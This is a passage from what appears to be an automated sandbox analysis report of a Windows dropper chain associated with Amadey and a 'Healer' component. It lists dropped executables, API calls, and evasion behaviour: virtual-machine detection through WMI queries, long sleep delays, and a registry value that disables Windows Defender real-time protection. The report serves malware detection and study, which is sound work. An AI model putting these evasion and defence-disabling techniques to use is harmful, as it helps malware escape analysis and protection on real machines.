                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: wextract.pdb source: file.exe, gDR79xP.exe.1.dr, gck46uD.exe.0.dr, gOk22TE.exe.2.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: gck46uD.exe, 00000001.00000003.250210360.00000000048F6000.00000004.00000020.00020000.00000000.sdmp, dEX81lT.exe.1.dr
                            Source: Binary string: wextract.pdbGCTL source: file.exe, gDR79xP.exe.1.dr, gck46uD.exe.0.dr, gOk22TE.exe.2.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: gOk22TE.exe, 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, aWM14.exe, 00000004.00000000.253025851.0000000000F22000.00000002.00000001.01000000.00000007.sdmp, aWM14.exe.3.dr
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0005724D push ecx; ret 0_2_00057260
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_0002724D push ecx; ret 1_2_00027260
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_0010724D push ecx; ret 2_2_00107260
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E724D push ecx; ret 3_2_010E7260
                            Source: ckg5133.exe.2.drStatic PE information: section name: .wel
                            Source: ckg5133.exe.2.drStatic PE information: section name: .fozoba
                            Source: ckg5133.exe.2.drStatic PE information: section name: .kezokix
                            Source: ckg5133.exe.2.drStatic PE information: section name: .luwe
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00052F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00052F1D
                            Source: aWM14.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x2c23
                            Source: bRz07Kk.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x32f4c
                            Source: fcC6215.exe.0.drStatic PE information: real checksum: 0x4e075 should be: 0x520d5
                            Source: dEX81lT.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x465b0
                            Source: aWM14.exe.3.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ckg5133.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00051AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00051AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_00021AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00021AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_00101AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00101AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,3_2_010E1AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe TID: 6116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe TID: 5544Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe TID: 3952Thread sleep count: 2044 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe TID: 4780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ckg5133.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWindow / User API: threadDelayed 2044Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2574
                            Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2574
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2575
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00055467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00055467
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00052390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00052390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_00022390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00022390
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_00102390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00102390
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_010E2390
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00052F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00052F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00056F40 SetUnhandledExceptionFilter,0_2_00056F40
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00056CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00056CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_00026F40 SetUnhandledExceptionFilter,1_2_00026F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_00026CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00026CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_00106F40 SetUnhandledExceptionFilter,2_2_00106F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_00106CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00106CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E6F40 SetUnhandledExceptionFilter,3_2_010E6F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_010E6CF0

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            .NET source code references suspicious native API functions
                            Source: aWM14.exe.3.dr, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                            Source: bRz07Kk.exe.3.dr, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                            Source: 4.0.aWM14.exe.f20000.0.unpack, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                            Source: 6.0.bRz07Kk.exe.1e0000.0.unpack, MemoryImport.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000518A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_000518A3
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00057155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00057155
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00052BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00052BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeCode function: 4_2_00007FFBACE2077D GetUserNameA,4_2_00007FFBACE2077D

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Disable Windows Defender real time protection (registry)
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                            Disable Windows Defender notifications (registry)
